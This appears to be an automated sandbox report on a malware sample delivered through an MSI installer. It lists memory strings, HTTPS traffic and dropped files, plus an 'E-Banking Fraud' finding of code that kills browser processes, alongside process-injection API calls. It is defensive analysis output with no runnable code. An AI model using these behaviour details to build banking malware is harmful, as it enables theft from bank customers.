            Source: explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49851 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49894 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49904 version: TLS 1.2

            E-Banking Fraud

            barindex
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe9_2_0E624948
            Source: C:\Windows\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe9_2_0E624948
            Source: C:\Windows\System32\rundll32.exeCode function: 5_3_000001E51CC9D326 NtProtectVirtualMemory,5_3_000001E51CC9D326
            Source: C:\Windows\System32\rundll32.exeCode function: 5_3_000001E51CC9D2B6 NtAllocateVirtualMemory,5_3_000001E51CC9D2B6
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E974BE0 NtProtectVirtualMemory,5_2_000001E51E974BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E974FF0 NtQueueApcThread,5_2_000001E51E974FF0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E974360 NtCreateThreadEx,5_2_000001E51E974360
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9417B0 NtClose,NtClose,5_2_000001E51E9417B0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E941600 NtClose,RtlExitUserThread,5_2_000001E51E941600
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E958149 NtSetContextThread,5_2_000001E51E958149
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9471B0 NtClose,5_2_000001E51E9471B0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E974740 NtFreeVirtualMemory,5_2_000001E51E974740
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E973F40 NtAllocateVirtualMemory,5_2_000001E51E973F40
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E957A50 NtSetContextThread,5_2_000001E51E957A50
            Source: C:\Windows\explorer.exeCode function: 9_2_0311C704 NtDelayExecution,9_2_0311C704
            Source: C:\Windows\explorer.exeCode function: 9_2_0311B388 NtAllocateVirtualMemory,9_2_0311B388
            Source: C:\Windows\explorer.exeCode function: 9_2_031182B4 NtFreeVirtualMemory,9_2_031182B4
            Source: C:\Windows\explorer.exeCode function: 9_2_03120130 NtAllocateVirtualMemory,9_2_03120130
            Source: C:\Windows\explorer.exeCode function: 9_2_031181C8 NtWriteFile,9_2_031181C8
            Source: C:\Windows\explorer.exeCode function: 9_2_03118240 NtClose,9_2_03118240
            Source: C:\Windows\explorer.exeCode function: 9_2_031180B8 RtlInitUnicodeString,NtCreateFile,9_2_031180B8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62241C NtAllocateVirtualMemory,9_2_0E62241C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62248C NtFreeVirtualMemory,9_2_0E62248C
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\45150f.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI15E9.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1658.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1688.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI16A8.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI16F7.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17D3.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI15E9.tmpJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB6A503_2_00CB6A50
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CEF0323_2_00CEF032
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CDC2CA3_2_00CDC2CA
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE92A93_2_00CE92A9
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CDE2703_2_00CDE270
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE84BD3_2_00CE84BD
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CDA5873_2_00CDA587
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CBC8703_2_00CBC870
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CDA9153_2_00CDA915
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD49203_2_00CD4920
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE0A483_2_00CE0A48
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB9CC03_2_00CB9CC0
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE5D6D3_2_00CE5D6D
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1BFB85_2_000001E51AE1BFB8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE28BB05_2_000001E51AE28BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE000385_2_000001E51AE00038
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFA0305_2_000001E51ADFA030
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADF8F7C5_2_000001E51ADF8F7C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1F1345_2_000001E51AE1F134
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE0B0745_2_000001E51AE0B074
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2C0645_2_000001E51AE2C064
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1ED845_2_000001E51AE1ED84
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE22F345_2_000001E51AE22F34
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFAED45_2_000001E51ADFAED4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFDED45_2_000001E51ADFDED4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE27E705_2_000001E51AE27E70
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADEDE7C5_2_000001E51ADEDE7C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFBE745_2_000001E51ADFBE74
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADED4405_2_000001E51ADED440
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE272445_2_000001E51AE27244
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE041DC5_2_000001E51AE041DC
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE171E45_2_000001E51AE171E4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE0C1985_2_000001E51AE0C198
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2214C5_2_000001E51AE2214C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADF83305_2_000001E51ADF8330
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2A2945_2_000001E51AE2A294
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE0E8405_2_000001E51AE0E840
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADF78085_2_000001E51ADF7808
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE0A7F05_2_000001E51AE0A7F0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE147805_2_000001E51AE14780
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE178D85_2_000001E51AE178D8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE218BC5_2_000001E51AE218BC
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFF84C5_2_000001E51ADFF84C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE176445_2_000001E51AE17644
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFA6305_2_000001E51ADFA630
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE0E5B45_2_000001E51AE0E5B4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFD7345_2_000001E51ADFD734
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE097445_2_000001E51AE09744
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADEF6C45_2_000001E51ADEF6C4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1B6A05_2_000001E51AE1B6A0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE26C205_2_000001E51AE26C20
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFEB905_2_000001E51ADFEB90
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1FD385_2_000001E51AE1FD38
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADF6CE05_2_000001E51ADF6CE0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE039CC5_2_000001E51AE039CC
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADEE9E85_2_000001E51ADEE9E8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1B96C5_2_000001E51AE1B96C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2DB3B5_2_000001E51AE2DB3B
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2AAF85_2_000001E51AE2AAF8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51ADFDB045_2_000001E51ADFDB04
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE17AA85_2_000001E51AE17AA8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE1FAC45_2_000001E51AE1FAC4
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190900245_2_000001E519090024
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190BDE5C5_2_000001E5190BDE5C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A9ED85_2_000001E5190A9ED8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51909D7245_2_000001E51909D724
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A65885_2_000001E5190A6588
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190CF5E05_2_000001E5190CF5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190BA0985_2_000001E5190BA098
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A70B05_2_000001E5190A70B0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A98D85_2_000001E5190A98D8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190BE0E85_2_000001E5190BE0E8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190CAF485_2_000001E5190CAF48
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51909EF6C5_2_000001E51909EF6C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190AD77C5_2_000001E5190AD77C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A88245_2_000001E5190A8824
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51909E2905_2_000001E51909E290
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190D6AEC5_2_000001E5190D6AEC
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190D11645_2_000001E5190D1164
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190C71805_2_000001E5190C7180
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190DA47E5_2_000001E5190DA47E
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51909CCE85_2_000001E51909CCE8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190CF36C5_2_000001E5190CF36C
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190A7BD85_2_000001E5190A7BD8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E5190AE4385_2_000001E5190AE438
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E95CBE05_2_000001E51E95CBE0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9728125_2_000001E51E972812
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E972F605_2_000001E51E972F60
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9613A35_2_000001E51E9613A3
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E96FBC05_2_000001E51E96FBC0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E962BB05_2_000001E51E962BB0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E95B4E05_2_000001E51E95B4E0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E95A1005_2_000001E51E95A100
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9495005_2_000001E51E949500
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9591205_2_000001E51E959120
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9714905_2_000001E51E971490
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E96B5E05_2_000001E51E96B5E0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9655E05_2_000001E51E9655E0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9499D05_2_000001E51E9499D0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9672205_2_000001E51E967220
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9702105_2_000001E51E970210
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E945D605_2_000001E51E945D60
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9645505_2_000001E51E964550
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9555C05_2_000001E51E9555C0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E954DB05_2_000001E51E954DB0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9666E05_2_000001E51E9666E0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E95BED05_2_000001E51E95BED0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E971F405_2_000001E51E971F40
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E94A7305_2_000001E51E94A730
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9682A05_2_000001E51E9682A0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9516A05_2_000001E51E9516A0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9542A05_2_000001E51E9542A0
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E9466C05_2_000001E51E9466C0
            Source: C:\Windows\explorer.exeCode function: 9_2_031121649_2_03112164
            Source: C:\Windows\explorer.exeCode function: 9_2_03111A7C9_2_03111A7C
            Source: C:\Windows\explorer.exeCode function: 9_2_03111A8C9_2_03111A8C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E624B509_2_0E624B50
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6B97089_2_0E6B9708
            Source: C:\Windows\explorer.exeCode function: 9_2_0E63FE389_2_0E63FE38
            Source: C:\Windows\explorer.exeCode function: 9_2_0E677EE89_2_0E677EE8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E681ECC9_2_0E681ECC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6B0EC09_2_0E6B0EC0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62BEB89_2_0E62BEB8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6BAE849_2_0E6BAE84
            Source: C:\Windows\explorer.exeCode function: 9_2_0E669F689_2_0E669F68
            Source: C:\Windows\explorer.exeCode function: 9_2_0E69AF209_2_0E69AF20
            Source: C:\Windows\explorer.exeCode function: 9_2_0E627FD09_2_0E627FD0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E64FC729_2_0E64FC72
            Source: C:\Windows\explorer.exeCode function: 9_2_0E687C149_2_0E687C14
            Source: C:\Windows\explorer.exeCode function: 9_2_0E629CBC9_2_0E629CBC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E695D689_2_0E695D68
            Source: C:\Windows\explorer.exeCode function: 9_2_0E650D189_2_0E650D18
            Source: C:\Windows\explorer.exeCode function: 9_2_0E65EDE09_2_0E65EDE0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E678DF89_2_0E678DF8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E649D949_2_0E649D94
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6B9D949_2_0E6B9D94
            Source: C:\Windows\explorer.exeCode function: 9_2_0E66EA849_2_0E66EA84
            Source: C:\Windows\explorer.exeCode function: 9_2_0E650A8A9_2_0E650A8A
            Source: C:\Windows\explorer.exeCode function: 9_2_0E690B549_2_0E690B54
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6A2B389_2_0E6A2B38
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6ADB349_2_0E6ADB34
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6BEBB89_2_0E6BEBB8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E66BB949_2_0E66BB94
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6878749_2_0E687874
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6588249_2_0E658824
            Source: C:\Windows\explorer.exeCode function: 9_2_0E65D8349_2_0E65D834
            Source: C:\Windows\explorer.exeCode function: 9_2_0E67481C9_2_0E67481C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6AD8B89_2_0E6AD8B8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6998B09_2_0E6998B0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6B49409_2_0E6B4940
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62D9E49_2_0E62D9E4
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6989809_2_0E698980
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6496509_2_0E649650
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6AD63C9_2_0E6AD63C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6457689_2_0E645768
            Source: C:\Windows\explorer.exeCode function: 9_2_0E69672C9_2_0E69672C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6377E09_2_0E6377E0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6887889_2_0E688788
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6774489_2_0E677448
            Source: C:\Windows\explorer.exeCode function: 9_2_0E67E45C9_2_0E67E45C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6924309_2_0E692430
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6A94F09_2_0E6A94F0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E66F4C49_2_0E66F4C4
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6884D89_2_0E6884D8
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6834989_2_0E683498
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6285689_2_0E628568
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6845649_2_0E684564
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6405409_2_0E640540
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6955349_2_0E695534
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62453C9_2_0E62453C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6805FC9_2_0E6805FC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E64F5FB9_2_0E64F5FB
            Source: C:\Windows\explorer.exeCode function: 9_2_0E66B5D09_2_0E66B5D0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6505A09_2_0E6505A0
